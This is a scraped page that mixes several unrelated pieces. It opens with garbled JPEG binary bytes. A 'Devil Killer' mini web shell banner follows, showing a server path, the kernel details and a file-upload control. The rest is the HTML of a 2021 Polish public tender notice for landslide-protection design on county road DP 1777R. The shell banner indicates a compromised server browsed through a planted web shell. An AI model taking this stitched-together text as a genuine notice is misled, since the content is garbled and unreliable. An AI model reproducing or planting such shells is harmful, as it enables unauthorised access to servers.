JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210809/0014050001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00140500 z dnia 2021-08-09</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zabezpieczenie osuwisk w ciągu DP nr 1777R - opracowanie dokumentacji projektowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Przemyślu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650945384</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Dominikański, 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdpprzemysl@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdpp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zabezpieczenie osuwisk w ciągu DP nr 1777R - opracowanie dokumentacji projektowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5dec6ea6-f67e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00140500</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000533/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Zabezpieczenie osuwisk w ciągu DP nr 1777R - opracowanie dokumentacji projektowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zp.powiat.przemysl.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zp.powiat.przemysl.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego,<br/>tj.bezpłatnierejestrując się lub logując, w przypadku posiadania konta w Platformie<br/>ZamówieńPublicznych,akceptuje warunki korzystania z Platformy, określone w Regulaminie<br/>zamieszczonym nastronieinternetowej https://zp.powiat.przemysl.pl/oraz uznaje go za wiążący.3.<br/>Ogólne zasadykorzystania zPlatformy:1) zgłoszenie do postępowania wymaga zalogowania<br/>Wykonawcy do Systemunasubdomenie https://zp.powiat.przemysl.pl/2) Wykonawca aby przystąpić do<br/>postępowaniamusizałożyć konto na Platformie https://zp.powiat.przemysl.pl/ gdzie zostanie<br/>powiadomiony omożliwościzalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada<br/>konto wykonująckroki procesurejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny, a<br/>następnie ustanawiahasło.3)Proces rejestracji Wykonawcy jest w pełni automatyczny, po<br/>zarejestrowaniu należy podaćdane firmy,którą osoba zakładająca konto reprezentuje.4) Po założeniu<br/>konta Wykonawca mamożliwość złożeniaOferty w postępowaniu. Komunikacja między Zamawiającym<br/>a Wykonawcami, wszczególnościzawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej zapośrednictwem Platformyi powiadomień mailowych.5) Zamawiający, zgodnie z §<br/>3ROZPORZĄDZENIE PREZESA RADYMINISTRÓWz dnia 30 grudnia 2020 r. w sprawie<br/>sposobusporządzania i przekazywania informacjioraz wymagań technicznych dla dokumentów<br/>elektronicznychoraz środków komunikacji elektronicznejw postępowaniu o udzielenie zamówienia<br/>publicznego lubkonkursie (dalej jako "Rozporządzenie")określa niezbędne wymagania sprzętowo -<br/>aplikacyjneumożliwiające pracę na Platformie Zakupowej,tj.: a) stały dostęp do sieci Internet o<br/>gwarantowanejprzepustowości nie mniejszej niż 512 kb/s,b)komputer klasy PC lub MAC, o<br/>następującej konfiguracji:pamięć min 2GB Ram, procesor Intel IV2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 10, MacOs x 10.4, Linux, lub ich nowszewersje,c) zainstalowana dowolna<br/>przeglądarka internetowa najlepiejnajnowszej dostępnej wersjiobsługująca TLS 1.2 z wyjątkiem<br/>Internet Explorer,d) włączona obsługaJavaScript,e) zainstalowanyprogram Acrobat Reader lub inny<br/>obsługujący pliki w formacie .pdf,f)podłączony lub wbudowany dokomputera czytnik karty<br/>kryptograficznej wydanej przez wystawcęcertyfikatu używanego przezWykonawcę.6) Zamawiający,<br/>zgodnie z § 3 powołanego powyżejRozporządzenia określa:a)dopuszczalne formaty przesyłanych<br/>danych, tj. plików o wielkości do 100MB w formatach: .doc, .pdf,.zip.b) informacje na temat kodowania i<br/>czasu odbioru danych: - plik załączony przez Wykonawcę naPlatformie Zamówień Publicznych izapisany, widoczny jest w Systemie, jako zaszyfrowany – formatkodowania UTF8. Możliwość<br/>otworzenia pliku dostępna jestdopiero po odszyfrowaniu przezZamawiającego po upływie terminu<br/>składania ofert.c) oznaczenieczasu odbioru danych przezPlatformę stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wgczasu platformy, który jestsynchronizowany ze znacznikiem czasu UTC.4.<br/>Wykonawca powiniendokładnie zapoznać się zniniejszą SWZ i złożyć ofertę zgodnie z określonymi<br/>wymaganiami.5.Wszelkie oświadczenia, wnioski,zawiadomienia oraz informacje przekazywane będą<br/>elektronicznie zapośrednictwem dedykowanegoformularza udostępnionego na Platformie:<br/>zp.powiat.przemysl.pl6.Dokumenty, podmiotowe środkidowodowe oraz inne dokumenty lub<br/>oświadczenia muszą być złożonew formie elektronicznej lub wpostaci elektronicznej opatrzone<br/>podpisem zaufanym lub podpisemosobistym osoby upoważnionej doreprezentowania wykonawców<br/>zgodnie z formą reprezentacjiokreśloną w dokumencie rejestrowymwłaściwym dla formy organizacyjnej<br/>lub innym dokumencie orazskładane są przez Wykonawcę zapośrednictwem Formularza do<br/>komunikacji jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takichdanych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U.<br/>UE L119 z dnia4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:2. administratorem<br/>Pani/Pana danychosobowych jestDyrektor Zarządu Dróg Powiatowych w Przemyślu Plac Dominikański<br/>3 , 37-700Przemyśl3.administrator wyznaczył Inspektora Danych Osobowych : P. mgr Elżbieta Kalita z<br/>którymmożna siękontaktować pod adresem e-mail: zdpprzemysl@op.pl, .tel. 16 675-00-254. Dane<br/>osobowewykonawcybędą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>zprzedmiotowympostępowaniem o udzielenie zamówienia publicznego. 5. Odbiorcami<br/>przekazanychprzez wykonawcędanych osobowych będą osoby lub podmioty, którym zostanie<br/>udostępnionadokumentacjapostępowania zgodnie z art.74 ustawy Pzp, a także art. 6 ustawy z 6<br/>września 2001 r. odostępie doinformacji publicznej.6. Dane osobowe wykonawcy zawarte w protokole<br/>postępowaniabędąprzechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie<br/>zamówienia, ajeżeliczas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwaniaumowy.7.Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Panadotyczących jestwymogiem ustawowym określonym w przepisanych ustawy P.Z.P.,<br/>związanym zudziałem wpostępowaniu o udzielenie zamówienia publicznego.8. W odniesieniu do<br/>Pani/Pana danychosobowychdecyzje nie będą podejmowane w sposób zautomatyzowany, stosownie<br/>do art. 22 RODO.9.PosiadaPani/Pan:a) na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowych Pani/Panadotyczących(w przypadku, gdy skorzystanie z tego prawa wymagałoby po<br/>stronie administratoraniewspółmierniedużego wysiłku może zostać Pani/Pan zobowiązana do<br/>wskazania dodatkowychinformacji mającychna celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lub datypostępowania o udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie<br/>nazwy lub datyzakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO<br/>prawo dosprostowaniaPani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>możeskutkować zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowieńumowy wzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności<br/>protokołu orazjegozałączników);c) na podstawie art. 18 RODO prawo żądania od<br/>administratoraograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania<br/>postępowania oudzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w<br/>art. 18 ust. 2RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania,w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw<br/>innej osobyfizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiejlubpaństwaczłonkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>naruszaprzepisy RODO;10. Nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawodo usunięciadanych osobowych;b) prawo do przenoszenia danych osobowych, o którym<br/>mowa w art.20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych,gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO;11.Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne<br/>zRODOprzetwarzanie Pani/Pana danych osobowych przez administratora. Organem<br/>właściwymdlaprzedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP.IV.333-19/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zabezpieczenie osuwisk w ciągu DP nr 1777R” - opracowanie dokumentacji projektowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">330 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował<br/>sięnastępującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób<br/>będzieoceniał spełnienie kryteriów: Lp. Opis kryterium oceny Znaczenie (%)1. Cena (koszt)<br/>60%2.Termin gwarancji i rękojmi 40% Razem 100%Oferty będą oceniane przez komisję<br/>przetargowąmetodą punktową w skali 100-punktowej. CENA – 60%Cena będzie oceniana metodą<br/>punktowąwg wzoru: Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium<br/>60%Cenaoferty badanej Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresiekryterium<br/>ceny. TERMIN GWARANCJI I RĘKOJMI – 40%Oferta w kryterium termin gwarancji irękojmi może<br/>uzyskać od 0 do 40 pkt, przy czym oferta z najdłuższym okresem gwarancji otrzymamax 40 pkt.<br/>Pozostałym wykonawcom zostaną przyznane punkty wg następującegowzoru: Wartość punktowa = Rk<br/>Tn / TmaxRk - waga kryteriumTn - termin gwarancji oferowany waktualnie ocenianej ofercie Tmax -<br/>największa liczba punktów osiągnięta przez którąkolwiek z ofertw ramach kryterium nr 2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60.00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40.00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w pkt. 8 II Rozdziału oraz spełniają na podstawie art. 112 określone przez<br/>Zamawiającego warunki udziału w postępowaniu dotyczące:1) zdolności do występowania w<br/>obrocie gospodarczym:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których<br/>spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.2) uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie<br/>Wykonawca zobowiązany jest wykazać w sposób szczególny.3) sytuacji ekonomicznej lub<br/>finansowej:Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie<br/>Wykonawca zobowiązany jest wykazać w sposób szczególny.4) zdolności technicznej lub<br/>zawodowej:Zamawiający uzna, że wykonawca spełnia warunek w zakresie kwalifikacji<br/>zawodowych, jeżeli: Wykonawca wykaże:- że będzie dysponował co najmniej jedną osobą<br/>posiadającą aktualne uprawnienia budowlane do projektowania w specjalności inżynieryjnej<br/>drogowej lub odpowiadające im równoważne uprawnienia- w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wykonali co najmniej jedną usługę projektową polegającą na opracowaniu dokumentacji<br/>projektowej na zabezpieczenie osuwiska, o wartości nie mniejszej niż 80.000 zł brutto ( nie<br/>dopuszcza się sumowania obiektów w celu uzyskania wymaganego parametru ) i uzyskała<br/>pozwolenie na budowę(zgodnie z rozporządzeniem Ministra Transportu i Gospodarki Morskiej z<br/>dnia 02.03.1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi<br/>publiczne i ich usytuowanie, Dz. U. z 1999r., nr 43, poz. 430 z późn. zm.) z załączeniem<br/>dowodów, że zostały wykonane należycie.UWAGA:Zamawiający, określając wymogi dla każdej<br/>osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im<br/>uprawnienia budowlane nadane obywatelom państw członkowskich w rozumieniu art 4a stawy z<br/>dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa(Dz. U z 2016 r., poz. 1725 t.j.). uznane na podstawie odrębnych przepisów, stosowanie do<br/>treści art. 12 a ustawy Prawo Budowlane .Ilekroć w opisie warunków udziału w postępowaniu<br/>mowa jest o uprawnieniach, to w przypadku osób będących obywatelami państw członkowskich<br/>oznacza to decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w<br/>Rzeczpospolitej Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie<br/>przedmiotu niniejszego zamówienia – zgodnie z właściwymi przepisami, w szczególności z<br/>Ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej (Dz. U. z 2016 r. poz. 65 z późn. zm.) oraz Ustawą z dnia 15 grudnia 2000 r. o<br/>samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U z 2016 r., poz.<br/>1725 t.j.).Wszystkie w/w osoby kadry technicznej muszą posługiwać się językiem polskim lub w<br/>przypadku braku znajomości języka polskiego przez w/w osoby, Wykonawca zobowiązany jest<br/>na własny koszt do zapewnienia tłumacza języka polskiego w celu stałego bieżącego i<br/>symultanicznego tłumaczenia w kontaktach pomiędzy Zamawiającym a personelem<br/>Wykonawcy. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z<br/>wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną<br/>przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za<br/>nieudostępnienie zasobów podmiot ten nie ponosi winy.Odnośnie do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane. W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy<br/>mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej<br/>ofertywezwiewykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie,niekrótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowychśrodkówdowodowych:1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z<br/>CentralnejEwidencji iInformacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy,sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia,<br/>wszczególnościodpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie<br/>robotamibudowlanymi, wraz zinformacją na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia iwykształcenianiezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanychprzez nieczynności oraz informacją o podstawie dysponowania tymi osobami<br/>PODMIOTYZAGRANICZNE:1)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza<br/>terytoriumRzeczypospolitej Polskiej,zamiast dokumentu, o których mowa w ust. 1pkt 2 składa<br/>dokument lubdokumenty wystawione wkraju, 